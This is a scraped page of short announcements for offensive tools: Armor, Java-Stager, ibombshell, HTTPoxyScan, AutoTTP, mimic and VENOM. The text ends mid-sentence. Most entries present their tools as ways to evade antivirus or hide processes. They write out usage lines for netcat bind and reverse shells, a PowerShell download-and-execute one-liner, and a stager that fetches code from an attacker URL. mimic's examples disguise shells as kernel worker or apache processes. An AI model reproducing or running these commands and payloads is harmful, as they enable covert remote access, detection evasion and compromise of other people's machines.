Armor – Tool Designed To Create Encrypted macOS Payloads Capable Of Evading Antivirus Scanners

Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners. Below is an example gif of Armor being used with a simple Netcat payload.A Netcat listener is started on port 4444. The “payload.txt" file is read and shown to contain a simple Bash one-liner that, when executed, will create a TCP connection between the target MacBook at the attacker’s Netcat listener. Armor is used to encrypt the bash one-liner. Ncat is used to host the decryption key on the attacker’s server. When the stager is executed in the target MacBook (not shown in the gif), the bash one-liner is decrypted and executed without writing any data to the harddrive. Ncat immediately terminates the listener after the key has been used. When the Netcat connection is established, the attacker has remote access to the target MacBook.Admittedly, encrypting most macOS-specific payloads is overkill. This specific bash one-liner is capable of bypassing antivirus without the help of Armor. But this is just an exmaple. The same degree of obfuscation can be applied to sophisticated Python, Ruby, and Shell scripts designed to execute a variety of advanced attacks.InstallationArmor relies on LibreSSL to encrypt the input file and create the SSL certificate. If LibreSSL isn’t found in your system, Armor will attempt to install it. The function for this can be found in the file. Ncat is also a dependency and can be installed in Kali using $ apt-get update && apt-get install nmap.Armor can be cloned and executed using the below commands.git clone Armor/chmod +x /path/to/payload.txt 443The address is the attacker’s IP address where the decryption key will be hosted. This can be a local IP address or VPS. The port number (443), is arbitrary and can be changed as needed.Questions and concerns:Twitter: @tokyoneon_WonderHowTo: dG9reW9uZW9uQHBtLm1lCg==Download Armor


Java-Stager – A PoC Java Stager Which Can Download, Compile, And Execute A Java File In Memory

A PoC Java Stager which can download, compile, and execute a Java file in memory.This is for research purposes only, do not use this where you are unauthorised to do so.What is this?This is based on the work of James Williams from his talk “Next Gen AV vs My Shitty Code" available here:The key parts of the talk for me are:Load a Stager onto victim (touches disk, but is a benign binary)Stager downloads raw code over HTTP (which stays in memory)Stager compiles raw code (also in memory)Stager then executes compiled code (also in memory)His example is in .net, but in the talk he suggested that Java would be capable of the same techniques.Working with itClone down the entire repository.Open it in an IDE which can use maven (such as NetBeans)The Stager, and the example payload are available in the "/src/main/java" folder.Alter the Stager as you would like and compile the project. I was using "clean/build" in the default profile.The output in NetBeans Included a line like this:Building jar: C:\Users\cornerpirate\Documents\NetBeansProjects\java-stager\target\JavaStager-0.1-initial.jarTo work on your victim you must upload the "JavaStager*.jar" file and the "lib" folder containing Janino from the "target" folder.The following command will execute the stager:java -jar JavaStager-0.1-initial.jarYou will be prompted with the usage as shown:Proper Usage is: java -jar JavaStager-0.1-initial.jar The "url" is the only parameter that is passed to Stager. An example usage would be:java -jar JavaStager-0.1-initial.jar http://attackerip/Payload.javaYour payload must be in a file called "" and your exploit code must be in a static method called "Run". The following shows the template if you want to write your own:public class Payload { public static void Run() { // Your code here }}More InformationBlog Post explaining how it all works: Showing how it worked in practice:Download Java-Stager


Ibombshell – Dynamic Remote Shell

ibombshell is a tool written in Powershell that allows you to have a prompt at any time with post-exploitation functionalities (and in some cases exploitation). It is a shell that is downloaded directly to memory providing access to a large number of pentesting features. These functionalities can be downloaded directly to memory, in the form of a Powershell function. This form of execution is known as everywhere.In addition, ibombshell provides a second execution mode called Silently, so the pentester can execute an instance of ibombshell (called warrior). The compromised computer will be connected to a C2 panel through HTTP. Therefore, it will be possible to control the warrior and be able to load functions in memory that help the pentester. This is happening whithin the post-exploitation phase.PrerequisitiesTo run ibombshell everywhere it is mandatory to have PowerShell 3.0 or higher. For operating systems other than Windows you can read more about this in the PowerShell GitHub – PowerShell for every system!.To run the ibombshell silently mode you need python 3.6 and some python libraries. You can install this with:cd ibombshell\ c2/ pip install -r requirements.txt Note: ibombshell C2 works in python 3.X. Make sure you run a pip relative to this version.Usageibombshell has two execution modes:ibombshell everywhereTo load ibombshell simply run on PowerShell:iex (new-object net.webclient).downloadstring(‘’) Now you can run the downloaded ibombshell console running:console ibombshell silently modeThis version allows you to run the ibombshell console and remotely control it from the C2 panel created in python. To run this version, first you must launch the console process in powershell:iex (new-object net.webclient).downloadstring(‘’) On ibombshell C2 path, prepare the C2:python3 And create the listener where the warriors will connected:iBombShell> load modules/ [+] Loading module… [+] Module loaded! iBombShell[modules/]> run The default listener port is 8080. Finally you can launch the console in silently mode on the host to get remote control:console -Silently -uriConsole http://[ip or domain]:[port] ibombshell C2 schemeThe basic operation of the ibombshell control panel follows the following scheme: ibombshell C2 | | | newibombshell | +———————>| –+ register | |<--+ from IP | get functions | | and instructions | +--------------------->| | | | send functions | | and instructions | execute +– |<———————+ +–>| | | results | +———————>| | | DockerWe have created a docker container with everything you need to make it works. Run this command from Dockerfile location.sudo docker build -t “ibombshell" . sudo docker run -it ibombshell Example videosSome example videos…iBombShell: PoC Warrior + Bypass UAC + Pass the hashiBombShell: macOSibombshell: Extracting Private SSH Keys on Windows 10iBombShell: PoC savefunctionsDownload Ibombshell


HTTPoxyScan – HTTPoxy Exploit Scanner

PoC/Exploit scanner to scan common CGI files on a target URL for the HTTPoxy vulnerability. Httpoxy is a set of vulnerabilities that affect application code running in CGI, or CGI-like environments. For more details, go to ncat to establish reverse sessionUSAGE:./ cgi_list.txt 3000This will scan with a list of common CGI files while injecting a Proxy header back to a given IP:PORT. A reverse listener will catch the incoming connection to confirm the remote site is vulnerable.Download HTTPoxyScan


AutoTTP – Automated Tactics Techniques & Procedures

Automated Tactics Techniques & Procedures. Re-running complex sequences manually for regression tests, product evaluations, generate data for researchers & so on can be tedious. I toyed with the idea of making it easier to script Empire (or any frameworks/products/toolkits that provide APIs like Metasploit (RPC), Cobalt-Strike & so on) using IDE like Visual Studio Code (or equivalent). So I started to design AutoTTP. This is still very much work in progress. Please use Empire 2.2.What is TTP?The tactics are organized as per my Attack Life Cycle model. There are other models like Lockheed Martin’s Kill-Chain(R), Mandiant Attack Life Cycle & Mitre’s ATT&CK. Whichever model it may be, a “Tactic" essentially groups techniques together, eg. code-execution/run-payload can be achieved with many ways:Has been used "Stage" to group relevant "Tactics" together. If you look into the source tree, the folder structure reflects the matrix’s Tactics column. The matrix also mentioned respective controls for each offensive tactic. How did these stages came about?The venn diagram in the middle of the red cycle is from Dartmouth College’s "Three Tenets for Secure Cyber-Physical System Design and Assessment". It defines the necessary & sufficient conditions, or simply the requirements of any successful physical/logical attacks. I added the red ring (stages) around the venn diagram to illustrate typical offensive flows which ultimately leads to impact of Information Confidentiality, Integrity, & System Availability or Safety if it is related Cyber-Physical (think Critical Information Infrastructure).An attacker can start from Stage 1 and get straight into Stage 4 eg. default admin credentials on an publicly exposed admin page. It does not need to be linear (stage 1->2->3->4). After the initial infiltration, s/he could have performed some internal information gathering (reconn) first before escalating privilege on the first machine & then launching a remote command to another target machine within the same network. For the next victim machine, it is a Stage 2; successful payload delivery and execution which allows the attacker to gain command & control over yet another machine.Download AutoTTP


Mimic – A Tool For Covert Execution In Linux

mimic is a tool for covert execution on Linux x86_64.What is “covert execution"?Covert execution is the art of hiding a process. In this case, mimic hides the process in plain sight. mimic can launch any program and make it look like any other program. Any user can use it. It does not require special permissions. It does not require special binaries. It does not require a root kit.What?! No special privileges??That is correct. mimic works by rearranging the internal structures of a process in such a way that it confuses the /proc entry for that process. All tools that report the nature of a process do so by examining /proc. If we can bend /proc, then we can hide a process in plain sight. Since we are only altering the state of a process we own, anyone can successfully run mimic.Can this be detected?!Of course, but only if you are looking very closely, or running a forensic tool that is looking for this sort of thing. The usefulness behind mimic is that it will prevent someone from becoming suspicious in the first place.Will this work with scripts?Yes, but you need to call mimic directly on the interpreter. For example, if the first line of your script is "#!/usr/bin/perl" then you’ll want to call mimic like this:empty@monkey:~$ mimic -e "/usr/bin/perl" By invoking the interpreter directly, mimic can work it’s magic.Who is the target audience for mimic?Anyone who legitimately needs covert execution before they have gotten root. This includes, but is not limited to:Pentesters.Investigators performing covert operations (with the prior approval of their Legal and HR departments, of course.)Why is it called "mimic"?Because "Liar, liar, /proc on fire!" was too long.What is "set_target_pid"?set_target_pid is a small helper program in the mimic suite that will exhaust pids until the one you want comes back around. This allows you to choose where in the process listing you want your process to sit. Note that the kernel reserves the first 300 pids for kernel threads. If you try to go below that, you’ll probably end up running with pid 301.Installationgit clone ptrace_domakecd ..git clone mimicmakeUsageusage: mimic -e COMMAND [-m MIMIC] [-b] [-a KEY=VALUE] [-q] [-h] -e Execute COMMAND. -m Setup COMMAND to look like MIMIC. Default for non-root is: "/usr/sbin/apache2 -k start" Default for root is: "[kworker/0:0]" -b Launch COMMAND in the background. -a Add / overwrite KEY to the mimic environment with associated VALUE. -q Be quiet! Do not print normal output. -h Print this helpful message. Notes: The MIMIC environment will be a copy of the COMMAND environment. The ‘_’ variable is automatically changed. The -a flag can be called multiple times to add / overwrite multiple variables. Examples: mimic -e /bin/bash set_target_pid 1 && mimic -e /bin/bash mimic -b -e "./revsh" mimic -b -e "nc -l -e /bin/bash" mimic -b -e "nc -l -e \"mimic -e /bin/bash\""ExamplesFirst example – Launching a netcat listener as a regular user:empty@monkey:~$ ./mimic -b -e "/usr/local/bin/ncat -l -e \"./mimic -e /bin/bash\""Launching child… Success!Waiting for child to attach… Success!Initializing ptrace_do… Success!Determining stack state… Success!Politely requesting name change… Success!Searching for main()… Success!Building execution headers… Success!Setting up final state… Success! Good-bye and have a good luck! :)empty@monkey:~$ ps aux | grep apacheempty 1931 19.5 0.0 16648 1324 pts/1 S 21:41 0:02 /usr/sbin/apache2 -k startempty 1935 0.0 0.0 7596 836 pts/1 S+ 21:41 0:00 grep apacheempty@monkey:~$ sudo lsof -i -n -P | grep apache[sudo] password for empty: apache2 1931 empty 3u IPv6 14462 0t0 TCP *:31337 (LISTEN)apache2 1931 empty 4u IPv4 14463 0t0 TCP *:31337 (LISTEN)Second example – Launching a netcat reverse shell as root:root@monkey:~$ /home/empty/code/mimic/set_target_pid 1 && /home/empty/code/mimic/mimic -b -q -e "/usr/local/bin/ncat -e \"/home/empty/code/mimic/mimic -e \\\"/bin/bash\\\"\" localhost 9999"Can you spot the fake kworkers? Would you be able to without the help of grep?root@monkey:~$ ps aux | grep kworker | grep -v greproot 18 0.0 0.0 0 0 ? S 19:39 0:00 [kworker/3:0]root 197 0.0 0.0 0 0 ? S 19:39 0:06 [kworker/u:3]root 198 0.0 0.0 0 0 ? S 19:39 0:06 [kworker/u:4]root 199 0.0 0.0 0 0 ? S 19:39 0:06 [kworker/u:5]root 302 23.4 0.0 18748 1912 pts/5 S 22:28 0:02 [kworker/0:0]root 304 11.4 0.0 3780 296 pts/5 S 22:28 0:00 [kworker/0:0] root 305 10.8 0.0 10644 1200 pts/5 S 22:28 0:00 [kworker/0:0]root 426 0.0 0.0 0 0 ? S 20:20 0:00 [kworker/1:0]root 434 0.0 0.0 0 0 ? S 20:20 0:00 [kworker/3:2]root 536 0.0 0.0 0 0 ? S 20:12 0:00 [kworker/0:0]root 879 0.0 0.0 0 0 ? S 20:39 0:00 [kworker/2:0]root 1463 0.0 0.0 0 0 ? S 19:39 0:00 [kworker/1:2]root 2132 0.0 0.0 0 0 ? S 19:47 0:00 [kworker/2:2]root 2607 0.0 0.0 0 0 ? S 20:01 0:01 [kworker/0:1]Of course, no kworker should have an open socket, but I’m sure you can be more creative with your naming choices than this. :)root@monkey:~$ lsof -i -n -P | grep kworkerkworker/0 302 root 4u IPv4 20546 0t0 TCP> (ESTABLISHED)kworker/0 304 root 4u IPv4 20546 0t0 TCP> (ESTABLISHED)kworker/0 305 root 4u IPv4 20546 0t0 TCP> (ESTABLISHED)Note that I’m running here as root only because a kworker thread should be very suspicious running as a non-root user. The new mimic name is just a string. It doesn’t have to be an existing process. Hell, it doesn’t even have to be a real thing!empty@monkey:~$ code/mimic/mimic -q -e /bin/bash -m "Totally not a rootkit\!"empty@monkey:~$ ps aux | grep rootkit | grep -v grepempty 399 2.9 0.0 3780 300 pts/4 S 22:34 0:00 Totally not a rootkit! empty 400 2.7 0.0 19372 2044 pts/4 S 22:34 0:00 Totally not a rootkit!Download Mimic


VENOM 1.0.15 – Metasploit Shellcode Generator/Compiler/Listener

The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll | msi | hta-psh ) injects the shellcode generated into one template (example: python) “the python funtion will execute the shellcode into ram" and uses compilers like gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recive the remote connection (shell or meterpreter session).’venom generator’ tool reproduces some of the technics used by,,, etc, etc, etc.."P.S. some payloads are undetectable by AV soluctions… yes!!!" One of the reasons for that its the use of a funtion to execute the 2° stage of shell/meterpreter directly into targets ram the other reazon its the use of external obfuscator/crypters.HOW DO I DELIVER MY PAYLOADS TO TARGET HOST ?venom (malicious_server) was build to take advantage of apache2 webserver to deliver payloads (LAN) using a fake webpage writen in html that takes advantage of